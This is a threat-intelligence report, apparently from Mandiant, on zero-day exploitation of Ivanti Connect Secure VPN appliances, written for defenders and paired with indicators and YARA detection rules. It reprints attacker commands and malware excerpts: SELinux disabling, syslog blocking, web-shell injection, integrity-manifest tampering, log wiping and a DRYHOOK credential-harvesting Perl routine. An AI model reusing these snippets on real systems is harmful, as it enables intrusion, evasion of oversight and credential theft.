GCP – Ivanti Connect Secure VPN Targeted in New Zero-Day Exploitation
Written by: John Wolfram, Josh Murchie, Matt Lin, Daniel Ainsworth, Robert Wallace, Dimiter Andonov, Dhanesh Kizhakkinan, Jacob Thompson
Note: This is a developing campaign under active analysis by Mandiant and Ivanti. We will continue to add more indicators, detections, and information to this blog post as needed.
On Wednesday, Jan. 8, 2025, Ivanti disclosed two vulnerabilities, CVE-2025-0282 and CVE-2025-0283, impacting Ivanti Connect Secure (“ICS”) VPN appliances. Mandiant has identified zero-day exploitation of CVE-2025-0282 in the wild beginning mid-December 2024. CVE-2025-0282 is an unauthenticated stack-based buffer overflow. Successful exploitation could result in unauthenticated remote code execution, leading to potential downstream compromise of a victim network.
Ivanti and its affected customers identified the compromise based on indications from the company-supplied Integrity Checker Tool (“ICT”) along with other commercial security monitoring tools. Ivanti has been working closely with Mandiant, affected customers, government partners, and security vendors to address these issues. As a result of their investigation, Ivanti has released patches for the vulnerabilities exploited in this campaign and Ivanti customers are urged to follow the actions in the Security Advisory to secure their systems as soon as possible.
Mandiant is currently performing analysis of multiple compromised Ivanti Connect Secure appliances from multiple organizations. The activity described in this blog utilizes insights collectively derived from analysis of these infected devices and have not yet conclusively tied all of the activity described below to a single actor. In at least one of the appliances undergoing analysis, Mandiant observed the deployment of the previously observed SPAWN ecosystem of malware (which includes the SPAWNANT installer, SPAWNMOLE tunneler and the SPAWNSNAIL SSH backdoor). The deployment of the SPAWN ecosystem of malware following the targeting of Ivanti Secure Connect appliances has been attributed to UNC5337, a cluster of activity assessed with moderate confidence to be part of UNC5221, which is further described in the Attribution section.
Mandiant has also identified previously unobserved malware families from additional compromised appliances, tracked as DRYHOOK and PHASEJAM that are currently not yet linked to a known group.
It is possible that multiple actors are responsible for the creation and deployment of these various code families (i.e. SPAWN, DRYHOOK and PHASEJAM), but as of publishing this report, we don’t have enough data to accurately assess the number of threat actors targeting CVE-2025-0282. As additional insights are gathered, Mandiant will continue to update this blog post.
While CVE-2025-0282 affects multiple patch levels of ICS release 22.7R2, successful exploitation is version specific. Prior to exploitation, repeated requests to the appliance have been observed, likely to determine the version prior to attempting exploitation.
/dana-cached/hc/hc_launcher. |
Version detection has been observed using the Host Checker Launcher, shown above, and the different client installers to determine the version of the appliance. HTTP requests from VPS providers or Tor networks to these URLs, especially in sequential version order, may indicate pre-exploitation reconnaissance.
While there are several variations during the exploitation of CVE-2025-0282, the exploit and script generally performs the following steps:
Disable SELinux
Prevent syslog forwarding
Remount the drive as read-write
Write the script
Execute the script
Deploy one or more web shells
to remove specific log entries from the debug and application logs -
Reenable SELinux
Remount the drive
Immediately after exploitation the threat actor disables SELinux, uses iptables
to block syslog forwarding, and remounts the root partition to enable writing of malware to the appliance.
setenforce 0
iptables -A OUTPUT -p udp --dport 514 -j DROP
iptables -A OUTPUT -p tcp --dport 514 -j DROP
iptables -A OUTPUT -p udp --dport 6514 -j DROP
iptables -A OUTPUT -p tcp --dport 6514 -j DROP
mount -o remount,rw /
Malware Staging
Mandiant observed the threat actor using the shell script to echo a Base64-encoded script into the /tmp/.t
, and then set execution permissions on the file. The figure below shows the contents of /tmp/.t
export LD_LIBRARY_PATH=/home/lib/;export DSINSTALL=/home;
export PATH=/usr/local/bin:/bin:/usr/bin:/sbin:/home/bin:/home/venv3/bin/;
dmesg -C;bash /tmp/s>/tmp/kN;
Next, the threat actor writes a Base-64 encoded ELF binary into /tmp/svb
. The ELF binary first uses setuid
to set the owner of the process to root. It then executes /tmp/s
(PHASEJAM) which would inherit the root privileges of the parent process. The threat actor then uses dd
to overwrite the svb
file with zeros, and removes /tmp/.t
/bin/chmod 6777 /tmp/svb;
/bin/dd count=1 bs=4096 if=/dev/zero of=/tmp/svb;
/bin/chmod 666 /tmp/svb;
/bin/rm -rf /tmp/.t;
PHASEJAM is a dropper written as a bash shell script that maliciously modifies Ivanti Connect Secure appliance components. The primary functions of PHASEJAM are to insert a web shell into the getComponent.cgi
and restAuth.cgi
files, block system upgrades by modifying the DSUpgrade.pm
file, and overwrite the remotedebug
executable so that it can be used to execute arbitrary commands when a specific parameter is passed.
Web Shell
PHASEJAM inserts the web shell into the legitimate files getComponent.cgi
and restAuth.cgi
as a function named AccessAllow()
. The web shell is Perl-based and provides the threat actor with remote access and code execution capabilities on the compromised ICS server. It utilizes the MIME::Base64
module to encode and decode commands and data.
The table below summarizes the web shell’s functionality, accessible via specific commands derived from HTTP query parameters:
Command |
Description |
Decodes the code provided in the |
Similar to command 1 but executes the provided commands using |
Writes a file with a name specified in the |
Reads the content of a file specified in the Base64-decoded |
Similar to command 3 but overwrites the target file instead of appending to it, in case it already exists on the appliance. |
Blocked and Simulated Upgrades
To intercept upgrade attempts and simulate an upgrade, PHASEJAM injects a malicious function into the /home/perl/DSUpgrade.pm
file named processUpgradeDisplay()
. The functionality is intended to simulate an upgrading process that involves thirteen steps, with each of those taking a predefined amount of time. If the ICS administrator attempts an upgrade, the function displays a visually-convincing upgrade process that shows each of the steps along with various numbers of dots to mimic a running process. Further details are provided in the System Upgrade Persistence section.
remotedebug Hooking
PHASEJAM renames the file /home/bin/remotedebug
to remotedebug.bak
. PHASEJAM writes a new /home/bin/remotedebug
shell script to hook calls to remotedebug
. The brief shell script checks for a new -c
parameter that allows remote code execution by the web shell. All other parameters are passed through to remotedebug.bak
The following provides an abridged PHASEJAM Sample:
# create backdoor 1
cp /home/webserver/htdocs/dana-na/jam/getComponent.cgi
sed -i 's/sub main {/sub main {my $r7=AccessAllow();return if
$r7;/g' /home/webserver/htdocs/dana-na/jam/getComponent.cgi
sh=$(echo CnN1YiB...QogICAK|base64 -d)
up=$(echo CnN1YiB...xuIjsKCn0K |base64 -d)
grep -q 'sub AccessAllow()' || echo "$sh" >>
sed -i "s/$(grep /home/webserver/htdocs/dana-na/jam/getComponent.cgi
/home/etc/manifest/manifest -a |grep
-oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/webserver/htdocs/dana-na/jam/getComponent.cgi |grep
-oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
#pkill cgi-server
# create backdoor 2
cp /home/webserver/htdocs/dana-na/auth/restAuth.cgi
sed -i 's/sub main {/sub main {my $r7=AccessAllow();return if
$r7;/g' /home/webserver/htdocs/dana-na/auth/restAuth.cgi
grep -q 'sub AccessAllow()' echo "$sh" >>
sed -i "s/$(grep /home/webserver/htdocs/dana-na/auth/restAuth.cgi
/home/etc/manifest/manifest -a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl
dgst -sha256 /home/webserver/htdocs/dana-na/auth/restAuth.cgi |grep
-oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
#pkill cgi-server
# remotedebug
cp -f /home/bin/remotedebug /home/bin/remotedebug.bak
echo IyEvYmluL2Jhc2gKaWYgWyAiJDEiID09ICItYyIgXTsgdGhlbgoJYm
nLmJhayAiJEAiCmZpICAK|base64 -d >/home/bin/remotedebug
chmod 777 /home/bin/remotedebug.bak
sed -i "s/$(grep /home/bin/remotedebug /home/etc/manifest/manifest
-a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/bin/remotedebug |grep -oE '[0-9a-f]{64}')/g"
# upgrade
cp -f /home/perl/DSUpgrade.pm /home/perl/DSUpgrade.pm.bak
sed -i 's/popen(*FH, $prog);/processUpgradeDisplay($prog,
$console, $html);return 0;popen(*FH, $prog);/g'
grep -q 'sub processUpgradeDisplay()' || echo "$up" >>
sed -i "s/$(grep /home/perl/DSUpgrade.pm /home/etc/manifest/manifest
-a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/perl/DSUpgrade.pm |grep -oE '[0-9a-f]{64}')/g"
pkill cgi-server
Following exploitation, the threat actor has been observed removing evidence of exploitation from several key areas of the appliance:
Clearing kernel messages using
and removing entries from the debug logs that are generated during the exploit -
Deleting troubleshoot information packages (state dumps) and any core dumps generated from process crashes
Removing log application event log entries related to syslog failures, internal ICT failures, crash traces, and certificate handling errors
Removing executed commands from the SELinux audit log
dmesg -C
cd /data/var/dlogs/
sed -i '/segfault/d' debuglog
sed -i '/segfault/d' debuglog.old
sed -i '/SystemError/d' debuglog
sed -i '/SystemError/d' debuglog.old
sed -i '/ifttls/d' debuglog
sed -i '/ifttls/d' debuglog.old
sed -i '/main.cc/d' debuglog
sed -i '/main.cc/d' debuglog.old
sed -i '/SSL_read/d' debuglog
sed -i '/SSL_read/d' debuglog.old
sed -i '/tlsconnectionpoint/d' debuglog
sed -i '/tlsconnectionpoint/d' debuglog.old
rm -rf /data/var/statedumps/*
rm -rf /data/var/cores/*
cd /home/runtime/logs
sed -i 's/[^x00]{1}x00[^x00]*web server[^x00]*x00//g' log.events.vc0
sed -i 's/[^x00]{1}x00[^x00]*AUT24604[^x00]*x00//g' log.events.vc0
sed -i 's/[^x00]{1}x00[^x00]*SYS31048[^x00]*x00//g' log.events.vc0
sed -i 's/[^x01]{1}x01[^x01]*SYS31376[^x01]*x01//g' log.events.vc0
sed -i 's/x01[^x01]{2,3}6[^x01]*ERR10073[^xff]*x09[^x01]{1}x01/
x01/g' log.events.vc0
cd /data/var/log/audit/
sed -i '/bin/web/d' audit.log
sed -i '/setenforce/d' audit.log
sed -i '/mount/d' audit.log
sed -i '/bin/rm/d' audit.log
System Upgrade Persistence
Mandiant identified two techniques the threat actor employed to persist across system upgrades on compromised Ivanti Connect Secure appliances.
Fake System Upgrades
The first technique, utilized by PHASEJAM, prevents legitimate ICS system upgrade attempts by administrators via rendering a fake HTML upgrade progress bar while silently blocking the legitimate upgrade process. Due to the blocked upgrade attempt, the technique would allow any installed backdoors or tools left by the threat actor to persist on the current running version of the VPN while giving the appearance of a successful upgrade.
First, the threat actor uses sed
to insert a malicious Perl code into DSUpgrade.pm
to modify the behavior of the system upgrade process. The malicious processUpgradeDisplay()
function, which is stored in the shell variable $up
, is appended to DSUpgrade.pm
sed -i 's/popen(*FH, $prog);/processUpgradeDisplay($prog,
$console, $html);return 0;popen(*FH, $prog);/g'
grep -q 'sub processUpgradeDisplay()' || echo "$up" >>
The modification occurs within a function in DSUpgrade.pm
responsible for installing the new upgrade package. The inserted call to processUpgradeDisplay()
with the early return makes the legitimate popen()
call to execute /pkg/dspkginstall
unreachable. The following provides the relevant excerpt from DSUpgrade.pm
as a result of the modification.
local *FH;
my $prog = "/pkg/dspkginstall /var/tmp/new-pack.tgz";
if (defined $useUpgradePartition && $useUpgradePartition == 1) {
$prog = "/pkg/dspkginstall /data/upgrade/new-pack.tgz";
processUpgradeDisplay($prog, $console, $html);
return 0;
popen(*FH, $prog);
The modification intercepts the standard upgrade flow by calling the maliciously created processUpgradeDisplay()
function before the legitimate upgrade command executes. The figure below provides an excerpt of the inserted processUpgradeDisplay()
function that displays a fake HTML upgrade progress bar, using the sleep
command to add dots every second to mimic a running process.
$mystep = 13;
$count = 0;
$sleep_time = 2;
$myline = "Finalizing installation";
print $html "<li style="margin:6px;">Step $mystep: $myline ...";
print $console "$myline ...";
while ($count < $sleep_time) {
system("/bin/sleep 1");
print $html ".";
print $console ".";
print $html " complete ($sleep_time seconds)</li>n";
print $console " complete ($sleep_time seconds)rn";
Recent versions of Ivanti Connect Secure have a built-in integrity checker tool (ICT) that periodically scans the file system to detect new or modified system files that may be indicative of system compromise. The ICT uses a manifest during its scanning process,containing a list of the expected file paths on the system along with its expected SHA256 hash. In an attempt to circumvent the ICT scanner, the threat actor recalculates the SHA256 hash of the modified DSUpgrade.pm
and inserts it into the manifest.
sed -i "s/$(grep /home/perl/DSUpgrade.pm
/home/etc/manifest/manifest -a |grep -oE
'[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/perl/DSUpgrade.pm |grep -oE '[0-9a-f]{64}')/g"
The threat actor copies the VERSION
file from the mounted upgrade partition (tmp/root/home/VERSION
) to the current version partition (/home/VERSION
). As a result, the system falsely indicates a successful upgrade while continuing to run on the old appliance version.
system("/bin/mkdir", "-p", "root/home");
system("/bin/tar", "-xzf", $tgz_path, "./root/home/VERSION");
system("/bin/cp -f ./root/home/VERSION /data/versions/reset/VERSION");
system("/bin/cp -f ./root/home/VERSION /home/VERSION");
The SHA256 hash of the VERSION
file from the upgrade partition is recalculated and inserted into the ICT manifest.
system('sed -i 's/$(grep /home/VERSION|grep
-oE "[0-9a-f]{64}")/$(/home/bin/openssl dgst -sha256
/home/VERSION)/g' /home/etc/manifest/manifest');
Persistence Across Upgrades
SPAWNANT (libupgrade.so
) is an ELF32 executable that installs three components from the SPAWN family:
SPAWNMOLE tunneler (
) -
) -
SPWANSLOTH log tampering utility (
SPAWNANT and its supporting components can persist across system upgrades. It hijacks the execution flow of dspkginstall
, a binary used during the system upgrade process, by exporting a malicious snprintf
function containing the persistence mechanism.
Unlike the first method described in this blog post for system upgrade persistence, SPAWNANT does not block the upgrade process. It survives the upgrade process by ensuring itself and its components are migrated to the new upgrade partition (mounted on /tmp/data/
during a legitimate system upgrade process).
cp /lib/libupgrade.so /tmp/data/root/lib
cp /home/lib/libsocks5.so /tmp/data/root/home/lib
cp /home/lib/libsshd.so /tmp/data/root/home/lib
environment variable to itself (libupgrade.so
) within DSUpgrade.pm
on the upgrade partition. The modification tells the dynamic linker to load libupgrade.so
and use SPAWNANT’s malicious exported snprintf
function before other libraries.
ENV{“LD_PRELOAD”} = “libupgrade.so”
Next, SPAWNANT establishes an additional method of backdoor access by writing a web shell into compcheckresult.cgi
on the upgrade partition. The web shell uses system()
to execute the value passed to a hard-coded query parameter. The following provides the relevant excerpt of the inserted web shell.
if(CGI::param("<redacted>")) {
print "Cache-Control: no-cache";
print "Content-type: text/html";
my $a=CGI::param("<redacted>");
Throughout this entire process, SPAWNANT is careful to circumvent the ICT by recalculating the SHA256 hash for any maliciously modified files. Once the appropriate modifications are complete, SPAWNANT generates a new RSA key pair to sign the modified manifest.
/home/bin/openssl genrsa -out private.pem 2048
/home/bin/openssl rsa -in private.pem -out manifest.2
-outform PEM -pubout
/home/bin/openssl dgst -sha512 -sign private.pem -out
manifest.1 /tmp/data/root/home/etc/manifest/manifest
mv manifest.1 manifest.2 /tmp/data/root/home/etc/manifest/
rm -f private.pem'
Post Exploitation
After establishing an initial foothold on an appliance, Mandiant observed a number of different tunnelers, including the use of publicly-available and open-source tunnelers, designed to facilitate communication channels between the compromised appliance and the threat actor’s command and control infrastructure. These tunnelers allowed the attacker to bypass network security controls and may enable lateral movement further into a victim environment.
Originally reported in Cutting Edge, Part 4, SPAWNMOLE is a tunneler injected into the web process. It hijacks the accept
function in the web
process to monitor traffic and filter out malicious traffic originating from the attacker. SPAWNMOLE is activated when it detects a specific series of magic bytes. Otherwise, the remainder of the benign traffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host provided by an attacker in the buffer.
LDAP Queries
The threat actor used several tools to perform internal network reconnaissance. This includes using built-in tools included on the ICS appliance such as nmap
and dig
to determine what can be accessed from the appliance. The threat actor has also been observed using the LDAP service account, if configured, from the ICS appliance to perform LDAP queries. The LDAP service account was also observed being used to move laterally within the network, including Active Directory servers, through SMB or RDP. The observed attacker commands were prefaced by the following lines:
export LD_LIBRARY_PATH=/home/lib/;
export DSINSTALL=/home;
export PATH=/usr/local/bin:/bin:/usr/bin:/sbin:/home/bin:/home/venv3/bin/;
dmesg -c;
The following reconnaissance commands were seen executed by the threat actor prior to LDAP queries:
nmap -Pn -sT -p 80,443,445 <IP ADDRESS> --open
LDAP queries were executed using /tmp/lmdbcerr
, with output directed to randomly named files in the /tmp
directory. Password, host, and query were passed as command line arguments.
/tmp/lmdbcerr [redacted] -u 'CN=[redacted],CN=Managed Service
Accounts,DC=[redacted]' -p '[redacted]' -h <IP ADDRESS> --tls --dn
DC=[redacted] -o /tmp/<RANDOM STRING>
/tmp/lmdbcerr [redacted] -u 'dc=[redacted]' -p '<PASSWORD>' -h
api-[redacted].duosecurity.com --tls --dn dc=[redacted] -o
/tmp/lmdbcerr [redacted] -u 'dc=[redacted]' -p '<PASSWORD>' -h
api-[redacted].duosecurity.com --tls --filter '(cn=*)' --dn dc=[redacted]
/tmp/lmdbcerr [redacted] -u 'dc=[redacted]' -p '<PASSWORD>'
-h api-[redacted].duosecurity.com --tls --filter '(distinguishedName=*)'
--dn dc=[redacted] -o /tmp/<RANDOM STRING>
/tmp/lmdbcerr [redacted] -u 'dc=[redacted]' -p '<PASSWORD>'
-h api-[redacted].duosecurity.com --tls --filter '(dn=*)' --dn dc=[redacted]
Appliance Cache Database Theft
Mandiant has observed the threat actor archiving the database cache on a compromised appliance and staging the archived data in a directory served by the public-facing web server to enable exfiltration of the database. The database cache may contain information associated with VPN sessions, session cookies, API keys, certificates, and credential material.
The threat actor archives the contents of /runtime/mtmp/lmdb
. The resulting tar archive is then renamed and masquerades itself as a CSS file located within /home/webserver/htdocs/dana-na/css/
Ivanti has previously published guidance on remediating the risk that may result from the database cache dump. This includes resetting local account credentials, resetting API keys, and revoking certificates.
Credential Harvesting
Mandiant has observed the threat actor deploying a Python script, tracked as DRYHOOK, to steal credentials. The malware is designed to modify a system component named DSAuth.pm
that belongs to the Ivanti Connect Secure environment in order to harvest successful authentications.
Upon execution, the malicious Python script opens /home/perl/DSAuth.pm
and reads its content in a buffer. Next, the malware uses regular expressions to find and replace the following lines of code:
*runSignin = *DSAuthc::RealmSignin_runSignin;
The *setPrompt
value above is replaced with the following Perl code:
# *setPrompt
sub setPrompt{
my $res=@_[1]."=".@_[2]."n";
$ds_g .= $res;
return DSAuthc::RealmSignin_setPrompt(@_);
The injected setPrompt
routine captures the second and the third parameter, combines them into the format <param2>=<param3>
and then assigns the produced string to a global variable named $ds_g
. The next replacement, shown as follows, reveals that the second parameter is a username, and the third parameter is the password of a user trying to authenticate.
# *runSignin = *DSAuthc::RealmSignin_runSignin;
sub encode_base64 ($;$)
my $res = "";
my $eol = $_[1];
$eol = "n" unless defined $eol;
pos($_[0]) = 0; # ensure start at the beginning
$res = join '', map( pack('u',$_)=~ /^.(S*)/, ($_[0]=~/(.{1,45})/gs));
$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 - length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/'=' x $padding/e if $padding;
return $res;
sub runSignin{
my $res=DSAuthc::RealmSignin_runSignin(@_);
if(@_[1]->{status} != $DSAuth::Reject &&
@_[1]->{status} != $DSAuth::Restart){
if($ds_g ne ""){
my $dd=RC4("redacted",$ds_g);
print FH encode_base64($dd)."n";
$ds_g = "";
elsif(@_[1]->{status} == $DSAuth::Reject ||
@_[1]->{status} == $DSAuth::Restart){
$ds_g = "";
return $res;
The code above contains two subroutines named encode_base64
and runSignin
. The former takes a string and Base64 encodes it, while the latter intercepts the sign-in process and upon a successful attempt serializes the saved credentials into the global variable $ds_g
username and password in a file named cmdmmap.kuwMW
under the /tmp
directory. The <username>=<password>
string is first RC4 encrypted with a hard-coded key and then Base64 encoded with the encode_base64
routine before being saved into the cmdmmap.kuwMW
The last code replacement is shown as follows, and it is the same code as above, but it targets a different sign-in scheme that is named EBSL in the code.
# *runSigninEBSL
sub runSigninEBSL{
my $res=DSAuthc::RealmSignin_runSigninEBSL(@_);
if(@_[1]->{status} != $DSAuth::Reject &&
@_[1]->{status} != $DSAuth::Restart){
if($ds_g ne ""){
use Crypt::RC4;
my $dd=RC4("redacted",$ds_g);
print FH encode_base64($dd)."n";
$ds_g = "";
elsif(@_[1]->{status} == $DSAuth::Reject ||
@_[1]->{status} == $DSAuth::Restart){
$ds_g = "";
return $res;
After the changes are made, the malware attempts to write the modified content back to the DSAuth.pm
file, and if unsuccessful, it will remount the file system as readwrite, write the file, and then mount the file system as readonly again. Finally, all instances of the cgi-server
process are killed in order for the modified DSAuth.pm
to be activated.
Mandiant has previously only observed the deployment of the SPAWN ecosystem of malware on Ivanti Connect Secure appliances by UNC5337. UNC5337 is a China-nexus cluster of espionage activity including operations that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024 and most recently as Dec. 2024. This included the Jan 2024 exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) to compromise Ivanti Connect Secure appliances. UNC5337 then leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is part of UNC5221.
UNC5221 is a suspected China-nexus espionage actor that exploited vulnerabilities CVE-2023-46805 and CVE-2024-21887, which impacted Ivanti Connect Secure VPN and Ivanti Policy Security appliances as early as December 2023. Following the successful exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection), UNC5221 leveraged multiple custom malware families, including the ZIPLINE passive backdoor, THINSPOOL dropper, LIGHTWIRE web shell, and WARPWIRE credential harvester. UNC5221 was also observed leveraging the PySoxy tunneler and BusyBox to enable post-exploitation activity. Additionally, Mandiant previously observed UNC5221 leveraging a likely ORB network of compromised Cyberoam appliances to enable intrusion operations.
Following the Jan. 10, 2024, disclosure of CVE-2023-46805 and CVE-2024-21887, Mandiant observed widespread exploitation by UNC5221 targeting Ivanti Connect Secure appliances across a wide range of countries and verticals. Mandiant assesses that defenders should be prepared for widespread, opportunistic exploitation, likely targeting credentials and the deployment of web shells to provide future access. Additionally, if proof-of-concept exploits for CVE-2025-0282 are created and released, Mandiant assesses it is likely additional threat actors may attempt targeting Ivanti Connect Secure appliances.
Ivanti recommends utilizing their external and internal Integrity Checker Tool (“ICT”) and to contact Ivanti Support if suspicious activity is identified. While Mandiant has observed threat actor attempts to evade detection by the ICT, the following screenshots provide examples of how a successful scan should appear versus an unsuccessful scan on a device that has been compromised. Note the number of steps reported by the output.
External ICT Scan – Successful
External ICT Scan – Unsuccessful (limited number of steps performed)
Ivanti also notes that the ICT is a snapshot of the current state of the appliance and cannot necessarily detect threat actor activity if they have returned the appliance to a clean state. The ICT does not scan for malware or other Indicators of Compromise. Ivanti recommends that customers should run the ICT in conjunction with other security monitoring tools which have detected post-exploitation activity.
If the ICT result shows signs of compromise, Ivanti recommends a factory reset on the appliance to ensure any malware is removed and to then place the appliance back into production using version 22.7R2.5.
We would like to thank the team at Ivanti for their continued partnership and support in this investigation. Additionally, this analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE.
Indicators of Compromise (IOCs)
To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a publicly available GTI Collection.
Code Family |
Filename |
Description |
n/a |
Credential Theft Tool |
/tmp/s |
Web Shell dropper |
PHASEJAM Webshell |
/home/webserver/htdocs/dana-na/auth/getComponent.cgi |
Web Shell |
PHASEJAM Webshell |
/home/webserver/htdocs/dana-na/auth/restAuth.cgi |
Web Shell |
/root/home/lib/libsshd.so |
SSH backdoor |
/root/home/lib/libsocks5.so |
Tunneler |
/root/lib/libupgrade.so |
Installer |
/tmp/.liblogblock.so |
Log tampering utility |
YARA Rules
rule M_APT_Installer_SPAWNSNAIL_1
author = "Mandiant"
description = "Detects SPAWNSNAIL. SPAWNSNAIL is an SSH
backdoor targeting Ivanti devices. It has an ability to inject a specified
binary to other process, running local SSH backdoor when injected to
dsmdm process, as well as injecting additional malware to dslogserver"
md5 = "e7d24813535f74187db31d4114f607a1"
$priv = "PRIVATE KEY-----" ascii fullword
$key1 = "%d/id_ed25519" ascii fullword
$key2 = "%d/id_ecdsa" ascii fullword
$key3 = "%d/id_rsa" ascii fullword
$sl1 = "[selinux] enforce" ascii fullword
$sl2 = "DSVersion::getReleaseStr()" ascii fullword
$ssh1 = "ssh_set_server_callbacks" ascii fullword
$ssh2 = "ssh_handle_key_exchange" ascii fullword
$ssh3 = "ssh_add_set_channel_callbacks" ascii fullword
$ssh4 = "ssh_channel_close" ascii fullword
uint32(0) == 0x464c457f and $priv and any of ($key*)
and any of ($sl*) and any of ($ssh*)
rule M_APT_Installer_SPAWNANT_1
author = "Mandiant"
description = "Detects SPAWNANT. SPAWNANT is an
Installer targeting Ivanti devices. Its purpose is to persistently
install other malware from the SPAWN family (SPAWNSNAIL,
SPAWNMOLE) as well as drop additional webshells on the box."
$s1 = "dspkginstall" ascii fullword
$s2 = "vsnprintf" ascii fullword
$s3 = "bom_files" ascii fullword
$s4 = "do-install" ascii
$s5 = "ld.so.preload" ascii
$s6 = "LD_PRELOAD" ascii
$s7 = "scanner.py" ascii
uint32(0) == 0x464c457f and 5 of ($s*)
rule M_APT_Tunneler_SPAWNMOLE_1
author = "Mandiant"
description = "Detects a specific comparisons in SPAWNMOLE
tunneler, which allow malware to filter put its own traffic .
SPAWNMOLE is a tunneler written in C and compiled as an ELF32
executable. The sample is capable of hijacking a process on the
compromised system with a specific name and hooking into its
communication capabilities in order to create a proxy server for
tunneling traffic."
md5 = "4f79c70cce4207d0ad57a339a9c7f43c"
3C 16 cmp al, 16h
74 14 jz short loc_5655C038
0F B6 45 C1 movzx eax, [ebp+var_3F]
3C 03 cmp al, 3
74 0C jz short loc_5655C038
0F B6 45 C5 movzx eax, [ebp+var_3B]
3C 01 cmp al, 1
0F 85 ED 00 00 00 jnz loc_5655C125
$comparison1 = { 3C 16 74 [1] 0F B6 [2] 3C 03 74 [1] 0F B6 [2]
3C 01 0F 85 }
81 7D E8 E2 E3 49 FB cmp [ebp+var_18], 0FB49E3E2h
0F 85 CD 00 00 00 jnz loc_5655C128
81 7D E4 61 83 C3 1B cmp [ebp+var_1C], 1BC38361h
0F 85 C0 00 00 00 jnz loc_5655C128
$comparison2 = { 81 [2] E2 E3 49 FB 0F 85 [4] 81 [2] 61 83 C3
1B 0F 85}
uint32(0) == 0x464c457f and all of them
rule M_Dropper_PHASEJAM_1 {
author = "Mandiant"
description = "Hunting rule looking for strings identified in the
PHASEJAM dropper"
md5 = "d18e5425ecd9608ecb992606b974e15d"
$str1 = "AccessAllow()"
$str2 = "/jam/getComponent.cgi"
$str3 = "jam/getComponent.cgi.bak"
$str4 = "sh=$(echo CnN1Y"
$str5 = "up=$(echo CnN1Y"
$str6 = "grep -q 'sub AccessAllow()'"
$str7 = "cp -f /home/bin/remotedebug /home/bin/remotedebug.bak"
$str8 = "chmod 777 /home/bin/remotedebug.bak"
$str9 = "cp -f /home/perl/DSUpgrade.pm /home/perl/DSUpgrade.pm.bak"
$str10 = "pkill cgi-server"
8 of them and filesize < 20KB
rule M_Credtheft_DRYHOOK_1 {
author = "Mandiant"
description = "Hunting rule looking for strings identified in
the DRYHOOK credential stealer"
md5 = "d4e46eed76ad86f08a40993c3e340bab"
$str1 = "/home/perl/DSAuth.pm"
$str2 = "replace_content"
$str3 = "replace1_content"
$str4 = "replace2_content"
$str5 = "pkill cgi-server"
$str6 = "setPrompt ="
$str7 = "runSignin = \*DSAuthc::RealmSignin_runSignin"
$str8 = "/bin/mount -o remount,rw / > /dev/null 2>&1"
$str9 = {64 61 74 61 20 3d 20 72 65 2e 73 75 62 28 62 22
5c 2a 72 75 6e 53 69 67 6e 69 6e 45 42 53 4c 20 3d 2e 2a 3b 22 2c
62 61 73 65 36 34 2e 62 36 34 64 65 63 6f 64 65 28 72 65 70 6c 61
63 65 32 5f 63 6f 6e 74 65 6e 74 2e 65 6e 63 6f 64 65 28 29 29 2e 64
65 63 6f 64 65 28 29 2e 65 6e 63 6f 64 65 28 22 75 6e 69 63 6f 64 65
5f 65 73 63 61 70 65 22 29 2c 64 61 74 61 29}
8 of them and filesize < 20KB
Read More for the details.